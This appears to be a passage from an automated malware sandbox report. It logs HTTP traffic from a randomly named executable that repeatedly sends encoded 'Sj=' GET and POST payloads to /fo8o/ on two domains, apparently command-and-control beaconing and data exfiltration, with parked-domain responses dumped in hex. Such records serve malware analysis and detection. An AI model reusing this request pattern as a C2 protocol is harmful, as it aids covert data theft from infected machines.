                                                                                    8192.168.2.44982185.159.66.93803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:42:29.407360077 CET505OUTGET /fo8o/?K8tpX=HvRPZ2CX3&Sj=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.magmadokum.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Dec 19, 2024 06:43:30.750988960 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.44996891.195.240.94803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:43:36.268707037 CET776OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 199
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                                                                    Data Ascii: Sj=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                                                                    Dec 19, 2024 06:43:37.542874098 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Thu, 19 Dec 2024 05:43:37 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.44997891.195.240.94803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:43:38.925314903 CET796OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 219
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                                                                    Data Ascii: Sj=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                                                                    Dec 19, 2024 06:43:40.201807022 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Thu, 19 Dec 2024 05:43:39 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.44998491.195.240.94803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:43:41.581525087 CET10878OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.rssnewscast.com
                                                                                    Origin: http://www.rssnewscast.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 10299
                                                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 53 6a 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 72 55 64 47 2b 49 [TRUNCATED]
                                                                                    Data Ascii: Sj=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumxjgYA3T03omVjmoKygZ3auJ1fqEyiPnZSOmmwNVQehO17FrO7yLilZzLBgYBWpkGikynLpHh/z8VpH01ZC01AOaFgACxHK9Br8lhYJTH+cQuTPcswDOawWreWLZROb4OQKDgXOpAzyrMvN6irQqFjBhHrUdG+IfBSNHSw7v+5bGEfkwDUsG9V5WGoC8+lR/xvv5niBHs5YxnNEvaYLO5HaaXzr9Yoi2eNK/mdKdDN+RzeKqs47wiqJPC1ch3USWoPC2f24K9QCdu1AgunazsdP+QpazQx7ROXqz+lwJKNZe1kvu/mxYEQfuN9kDrDcltTEHs/QZJEUzYvBM6bQMuPz1dVQDMpPWMz/pduf5vOWC2xUc3fv3IBc7OeUD7MIk0bf9Gbm+VO95HMSMAUe3tB+KdjVkVILNTrcl4P4HGW2E+u48IR+g1ays+RI/C1NBPJwVSCGAYSflKEdDQBKYWPtT2CERNvS+q2+Z7hUDmlvZrTzNm2Xa5KVKa1Co/3jN8MoOr7PfQ9Ia5yGc9dX0kFiKjsKUxE/Vp034fjrgGf9Mkg85IeCp+cob6ky3EsKMYZRr5JOnBPv4sN4v9yE4ndesPT8b8SoR6UgELJDvJDVi/IhvwyqS2mqOgKwAIreImiSDx0GiMs4qDzJw5y0zfSaRYkLSbz1s7AuiTEa1VmruK0xGZNeu6oOxQ587MegUgAtQ8J0kU9gVp6LCofjZX6p/d/Sn2hXihM9v1sm4iR2/t0BqhfxFWHV9Cy56ml/sLPWr4/1az18opf8DsZa1q68AlxVyJil3gJlvL/2Qi+kje9jUQzWqR8g3SLA60YIie [TRUNCATED]
                                                                                    Dec 19, 2024 06:43:42.856229067 CET707INHTTP/1.1 405 Not Allowed
                                                                                    date: Thu, 19 Dec 2024 05:43:42 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.44999091.195.240.94803300C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 06:43:44.236732960 CET506OUTGET /fo8o/?Sj=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&K8tpX=HvRPZ2CX3 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.rssnewscast.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Dec 19, 2024 06:43:45.539918900 CET1236INHTTP/1.1 200 OK
                                                                                    date: Thu, 19 Dec 2024 05:43:45 GMT
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    transfer-encoding: chunked
                                                                                    vary: Accept-Encoding
                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    pragma: no-cache
                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Dyb/7EqC2LwwVoRW8sjIc8QUMMjaQhRVSo6NxsZ5uQNND2v49FLRga4A5EQknqLd03kE3L4Iz84lwp+Qya66mA==
                                                                                    last-modified: Thu, 19 Dec 2024 05:43:45 GMT
                                                                                    x-cache-miss-from: parking-dc6db864f-vvl4v
                                                                                    server: Parking/1.0
                                                                                    connection: close
                                                                                    Data Raw: 33 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 44 79 62 2f 37 45 71 43 32 4c 77 77 56 6f 52 57 38 73 6a 49 63 38 51 55 4d 4d 6a 61 51 68 52 56 53 6f 36 4e 78 73 5a 35 75 51 4e 4e 44 32 76 34 39 46 4c 52 67 61 34 41 35 45 51 6b 6e 71 4c 64 30 33 6b 45 33 4c 34 49 7a 38 34 6c 77 70 2b 51 79 61 36 36 6d 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                                    Data Ascii: 309<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Dyb/7EqC2LwwVoRW8sjIc8QUMMjaQhRVSo6NxsZ5uQNND2v49FLRga4A5EQknqLd03kE3L4Iz84lwp+Qya66mA==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                    Dec 19, 2024 06:43:45.540066004 CET224INData Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69
                                                                                    Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" 570 type="image/png"
                                                                                    Dec 19, 2024 06:43:45.540098906 CET1236INData Raw: 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20
                                                                                    Data Ascii: href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.css v7.0.0 |
                                                                                    Dec 19, 2024 06:43:45.540136099 CET1236INData Raw: 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31
                                                                                    Data Ascii: input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,s1062elect{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:butt
                                                                                    Dec 19, 2024 06:43:45.540241957 CET1236INData Raw: 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70
                                                                                    Data Ascii: ay:none}[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{colo
                                                                                    Dec 19, 2024 06:43:45.540294886 CET672INData Raw: 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73
                                                                                    Data Ascii: om/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a
                                                                                    Dec 19, 2024 06:43:45.540329933 CET1236INData Raw: 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68
                                                                                    Data Ascii: ement-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webar
                                                                                    Dec 19, 2024 06:43:45.540389061 CET1236INData Raw: 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63
                                                                                    Data Ascii: ter;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:1
                                                                                    Dec 19, 2024 06:43:45.540433884 CET1236INData Raw: 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f
                                                                                    Data Ascii: ontent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px
                                                                                    Dec 19, 2024 06:43:45.540494919 CET1236INData Raw: 2e 33 73 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69
                                                                                    Data Ascii: .3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:
                                                                                    Dec 19, 2024 06:43:45.660181999 CET1236INData Raw: 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66
